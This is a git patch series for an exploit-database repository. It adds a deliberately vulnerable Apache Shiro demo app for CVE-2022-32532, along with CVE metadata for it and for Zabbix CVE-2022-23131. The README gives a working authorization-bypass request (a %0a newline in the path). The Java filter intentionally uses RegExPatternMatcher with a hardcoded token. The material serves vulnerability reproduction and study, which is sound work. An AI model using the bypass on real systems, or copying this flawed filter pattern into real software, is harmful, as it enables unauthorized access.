From 00a87dc29b7472c7c296213e8ce660d6afadf20a Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Sun, 9 Apr 2023 02:36:32 +0800
Subject: [PATCH 1/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/.gitignore | 3 ++
.../inspectionProfiles/profiles_settings.xml | 6 +++
.idea/misc.xml | 4 ++
.idea/modules.xml | 8 ++++
.idea/openkylin-exploit-db.iml | 12 ++++++
.idea/vcs.xml | 6 +++
...E-2022-23131.yaml => CVE-2022-23131.yaml} | 38 +++++++++----------
7 files changed, 58 insertions(+), 19 deletions(-)
create mode 100644 .idea/.gitignore
create mode 100644 .idea/inspectionProfiles/profiles_settings.xml
create mode 100644 .idea/misc.xml
create mode 100644 .idea/modules.xml
create mode 100644 .idea/openkylin-exploit-db.iml
create mode 100644 .idea/vcs.xml
rename cve/zabbix/2022/yaml/{CVE-2022-23131.yaml => CVE-2022-23131.yaml} (98%)
diff --git a/.idea/.gitignore b/.idea/.gitignore
new file mode 100644
index 00000000..26d33521
--- /dev/null
+++ b/.idea/.gitignore
@@ -0,0 +1,3 @@
+# Default ignored files
+/shelf/
+/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
new file mode 100644
index 00000000..105ce2da
--- /dev/null
+++ b/.idea/inspectionProfiles/profiles_settings.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
new file mode 100644
index 00000000..dc9ea490
--- /dev/null
+++ b/.idea/misc.xml
@@ -0,0 +1,4 @@
+
+
+
+
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
new file mode 100644
index 00000000..f36de21d
--- /dev/null
+++ b/.idea/modules.xml
@@ -0,0 +1,8 @@
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
new file mode 100644
index 00000000..8b8c3954
--- /dev/null
+++ b/.idea/openkylin-exploit-db.iml
@@ -0,0 +1,12 @@
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
new file mode 100644
index 00000000..94a25f7f
--- /dev/null
+++ b/.idea/vcs.xml
@@ -0,0 +1,6 @@
+
+
+
+
+
+
\ No newline at end of file
diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
similarity index 98%
rename from cve/zabbix/2022/yaml/CVE-2022-23131.yaml
rename to cve/zabbix/2022/yaml/CVE-2022-23131.yaml
index 0eab256c..e3f384c6 100644
--- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
+++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml
@@ -1,20 +1,20 @@
-id: CVE-2022-23131
-source:
- https://github.com/L0ading-x/cve-2022-23131
-info:
- name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
- severity: critical
- description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
- scope-of-influence:
- Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
- - https://www.secpulse.com/archives/179601.html
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-23131
- cwe-id: CWE-290
- cnvd-id: None
- kve-id: None
+id: CVE-2022-23131
+source:
+ https://github.com/L0ading-x/cve-2022-23131
+info:
+ name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。
+ severity: critical
+ description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。
+ scope-of-influence:
+ Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-23131
+ - https://www.secpulse.com/archives/179601.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-23131
+ cwe-id: CWE-290
+ cnvd-id: None
+ kve-id: None
tags: 前端认证绕过漏洞
\ No newline at end of file
--
Gitee
From 33b810b8fcc2703e97e4d73b63180433305ce55a Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Sun, 9 Apr 2023 11:24:02 +0800
Subject: [PATCH 2/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../2022/CVE-2022-32532/.gitignore | 33 +++++++++++++++
.../2022/CVE-2022-32532/README.md | 35 ++++++++++++++++
cve/apache-Shiro/2022/CVE-2022-32532/pom.xml | 38 ++++++++++++++++++
.../com/example/shirodemo/DemoController.java | 21 ++++++++++
.../java/com/example/shirodemo/MyFilter.java | 35 ++++++++++++++++
.../shirodemo/MyShiroFilterFactoryBean.java | 40 +++++++++++++++++++
.../com/example/shirodemo/ShiroConfig.java | 22 ++++++++++
.../shirodemo/ShiroDemoApplication.java | 13 ++++++
.../src/main/resources/application.properties | 0
.../2022/yaml/CVE-2022-32532.yaml | 23 +++++++++++
openkylin_list.yaml | 4 +-
11 files changed, 263 insertions(+), 1 deletion(-)
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/README.md
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
create mode 100644 cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
create mode 100644 cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
new file mode 100644
index 00000000..549e00a2
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/.gitignore
@@ -0,0 +1,33 @@
+HELP.md
+target/
+!.mvn/wrapper/maven-wrapper.jar
+!**/src/main/**/target/
+!**/src/test/**/target/
+
+### STS ###
+.apt_generated
+.classpath
+.factorypath
+.project
+.settings
+.springBeans
+.sts4-cache
+
+### IntelliJ IDEA ###
+.idea
+*.iws
+*.iml
+*.ipr
+
+### NetBeans ###
+/nbproject/private/
+/nbbuild/
+/dist/
+/nbdist/
+/.nb-gradle/
+build/
+!**/src/main/**/build/
+!**/src/test/**/build/
+
+### VS Code ###
+.vscode/
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/README.md b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
new file mode 100644
index 00000000..975b0366
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/README.md
@@ -0,0 +1,35 @@
+# CVE-2022-32532
+
+## about
+
+This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
+
+In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
+
+## introduce
+
+Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
+
+This request can succeed
+```http request
+GET /permit/any HTTP/1.1
+Token: 4ra1n
+```
+
+Access is not allowed when there is no token request header
+```http request
+GET /permit/any HTTP/1.1
+```
+
+It can be bypassed in a simple way in special but common configurations
+```http request
+GET /permit/a%0any HTTP/1.1
+```
+
+## reference
+
+https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+
+This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
+
+Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
new file mode 100644
index 00000000..5210b547
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/pom.xml
@@ -0,0 +1,38 @@
+
+
+ 4.0.0
+
+ org.springframework.boot
+ spring-boot-starter-parent
+ 2.7.0
+
+
+ com.example
+ shiro-demo
+ 0.0.1-SNAPSHOT
+ shiro-demo
+ CVE-2022-32532
+
+ 1.8
+
+
+
+ org.springframework.boot
+ spring-boot-starter-web
+
+
+ org.apache.shiro
+ shiro-spring
+ 1.9.0
+
+
+
+
+
+ org.springframework.boot
+ spring-boot-maven-plugin
+
+
+
+
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
new file mode 100644
index 00000000..fd71b1a0
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/DemoController.java
@@ -0,0 +1,21 @@
+package com.example.shirodemo;
+
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class DemoController {
+ @RequestMapping(path = "/permit/{value}")
+ public String permit(@PathVariable String value) {
+ System.out.println("success!");
+ return "success";
+ }
+
+ // Another Bypass
+ // @RequestMapping(path = "/permit/*")
+ public String permit() {
+ System.out.println("success!");
+ return "success";
+ }
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
new file mode 100644
index 00000000..beaf98ae
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyFilter.java
@@ -0,0 +1,35 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.AccessControlFilter;
+
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+public class MyFilter extends AccessControlFilter {
+
+ public MyFilter(){
+ super();
+ this.pathMatcher = new RegExPatternMatcher();
+ }
+
+ @Override
+ protected boolean isAccessAllowed(ServletRequest request, ServletResponse response, Object mappedValue) {
+ String token = ((HttpServletRequest)request).getHeader("Token");
+ // todo: check permission ...
+ return token != null && token.equals("4ra1n");
+ }
+
+ @Override
+ protected boolean onAccessDenied(ServletRequest request, ServletResponse response) {
+ System.out.println("deny -> "+((HttpServletRequest)request).getRequestURI());
+ try {
+ response.getWriter().println("access denied");
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return false;
+ }
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
new file mode 100644
index 00000000..d24431e4
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/MyShiroFilterFactoryBean.java
@@ -0,0 +1,40 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.util.RegExPatternMatcher;
+import org.apache.shiro.web.filter.mgt.*;
+import org.apache.shiro.web.mgt.WebSecurityManager;
+import org.apache.shiro.web.servlet.AbstractShiroFilter;
+
+
+public class MyShiroFilterFactoryBean extends ShiroFilterFactoryBean {
+
+ public MyShiroFilterFactoryBean() {
+ super();
+ }
+
+ @Override
+ protected AbstractShiroFilter createInstance() {
+ SecurityManager securityManager = this.getSecurityManager();
+ FilterChainManager manager = new DefaultFilterChainManager();
+ manager.addFilter("myFilter",new MyFilter());
+ // my filter
+ manager.addToChain("/permit/.*", "myFilter");
+ // todo: add other filters
+
+ PathMatchingFilterChainResolver chainResolver = new PathMatchingFilterChainResolver();
+ chainResolver.setFilterChainManager(manager);
+ // set RegExPatternMatcher
+ chainResolver.setPathMatcher(new RegExPatternMatcher());
+ return new SpringShiroFilter((WebSecurityManager) securityManager, chainResolver);
+ }
+
+ static class SpringShiroFilter extends AbstractShiroFilter {
+ protected SpringShiroFilter(WebSecurityManager webSecurityManager, FilterChainResolver resolver) {
+ this.setSecurityManager(webSecurityManager);
+ this.setFilterChainResolver(resolver);
+ }
+ }
+}
+
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
new file mode 100644
index 00000000..30a0f1b5
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroConfig.java
@@ -0,0 +1,22 @@
+package com.example.shirodemo;
+
+import org.apache.shiro.mgt.SecurityManager;
+import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+
+@Configuration
+public class ShiroConfig {
+
+ @Bean
+ public SecurityManager securityManager() {
+ return new DefaultWebSecurityManager();
+ }
+
+ @Bean
+ public MyShiroFilterFactoryBean shiroFilter(SecurityManager securityManager) {
+ MyShiroFilterFactoryBean shiroFilterFactoryBean = new MyShiroFilterFactoryBean();
+ shiroFilterFactoryBean.setSecurityManager(securityManager);
+ return shiroFilterFactoryBean;
+ }
+}
\ No newline at end of file
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
new file mode 100644
index 00000000..5d4615bd
--- /dev/null
+++ b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/java/com/example/shirodemo/ShiroDemoApplication.java
@@ -0,0 +1,13 @@
+package com.example.shirodemo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class ShiroDemoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(ShiroDemoApplication.class, args);
+ }
+
+}
diff --git a/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties b/cve/apache-Shiro/2022/CVE-2022-32532/src/main/resources/application.properties
new file mode 100644
index 00000000..e69de29b
diff --git a/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
new file mode 100644
index 00000000..12fb0f1a
--- /dev/null
+++ b/cve/apache-Shiro/2022/yaml/CVE-2022-32532.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-32532
+source: https://github.com/Lay0us1/CVE-2022-32532
+info:
+ name: Apache Shiro是美国阿帕奇(Apache)基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。
+ severity: CRITICAL
+ description: |
+ 在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。
+ scope-of-influence:
+ Apache Shiro 1.9.1之前
+ reference:
+ - https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-32532
+ - https://www.cybersecurity-help.cz/vdb/SB2022062909
+ - https://cxsecurity.com/cveshow/CVE-2022-32532/
+ - https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-32532
+ cwe-id: CWE-863
+ cnvd-id: CNNVD-202206-2750
+ kve-id: None
+ tags: 旁路授权
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 7128c8a6..c3c646b5 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -38,7 +38,9 @@ cve:
apache-unomi:
- CVE-2020-13942
apache-struts:
- - CVE-2019-0230
+ - CVE-2019-0230
+ apache-Shiro:
+ - CVE-2022-32532
Influx-DB:
- CVE-2019-20933
linux-kernel:
--
Gitee
From 2e50b4b42e7909c2608f6223e8ee8c9f21383fbc Mon Sep 17 00:00:00 2001
From: wzf <1020417550@qq.com>
Date: Tue, 11 Apr 2023 19:08:31 +0800
Subject: [PATCH 3/3] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2022-32532?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.idea/.gitignore | 3 ---
.idea/inspectionProfiles/profiles_settings.xml | 6 ------
.idea/misc.xml | 4 ----
.idea/modules.xml | 8 --------
.idea/openkylin-exploit-db.iml | 12 ------------
.idea/vcs.xml | 6 ------
6 files changed, 39 deletions(-)
delete mode 100644 .idea/.gitignore
delete mode 100644 .idea/inspectionProfiles/profiles_settings.xml
delete mode 100644 .idea/misc.xml
delete mode 100644 .idea/modules.xml
delete mode 100644 .idea/openkylin-exploit-db.iml
delete mode 100644 .idea/vcs.xml
diff --git a/.idea/.gitignore b/.idea/.gitignore
deleted file mode 100644
index 26d33521..00000000
--- a/.idea/.gitignore
+++ /dev/null
@@ -1,3 +0,0 @@
-# Default ignored files
-/shelf/
-/workspace.xml
diff --git a/.idea/inspectionProfiles/profiles_settings.xml b/.idea/inspectionProfiles/profiles_settings.xml
deleted file mode 100644
index 105ce2da..00000000
--- a/.idea/inspectionProfiles/profiles_settings.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/misc.xml b/.idea/misc.xml
deleted file mode 100644
index dc9ea490..00000000
--- a/.idea/misc.xml
+++ /dev/null
@@ -1,4 +0,0 @@
-
-
-
-
\ No newline at end of file
diff --git a/.idea/modules.xml b/.idea/modules.xml
deleted file mode 100644
index f36de21d..00000000
--- a/.idea/modules.xml
+++ /dev/null
@@ -1,8 +0,0 @@
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/openkylin-exploit-db.iml b/.idea/openkylin-exploit-db.iml
deleted file mode 100644
index 8b8c3954..00000000
--- a/.idea/openkylin-exploit-db.iml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/.idea/vcs.xml b/.idea/vcs.xml
deleted file mode 100644
index 94a25f7f..00000000
--- a/.idea/vcs.xml
+++ /dev/null
@@ -1,6 +0,0 @@
-
-
-
-
-
-
\ No newline at end of file
--
Gitee